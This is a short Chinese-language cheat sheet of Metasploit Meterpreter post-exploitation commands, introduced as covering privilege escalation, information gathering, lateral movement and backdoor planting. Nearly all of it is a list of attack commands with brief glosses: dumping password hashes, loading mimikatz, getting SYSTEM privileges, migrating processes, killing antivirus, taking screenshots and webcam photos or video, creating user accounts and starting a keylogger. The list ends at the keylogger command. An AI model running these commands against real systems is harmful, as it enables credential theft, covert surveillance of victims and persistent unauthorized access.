Meterpreter后渗透
-
提权
-
信息收集
-
内网横向渗透
-
植入后门
这里就介绍一下MSF后渗透的常用命令
常用命令
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息 在此目录/root/.msf4/logs/scripts/scraper
run hashdump #导出密码的哈希
load kiwi #加载mimikatz
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
getpid #查看当前Meterpreter Shell的进程PID
getuid #查看当前用户
getsystem #获取system权限
migrate 123 #迁移进程
idletime #查看主机运行时间
run killav #关闭杀毒软件
screenshot #截图[清晰一点]
screengrab #截图[模糊一点]
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute -f xx #执行可执行程序 //具体参数百度即可
run getgui -u x -p x #创建用户
keyscan_start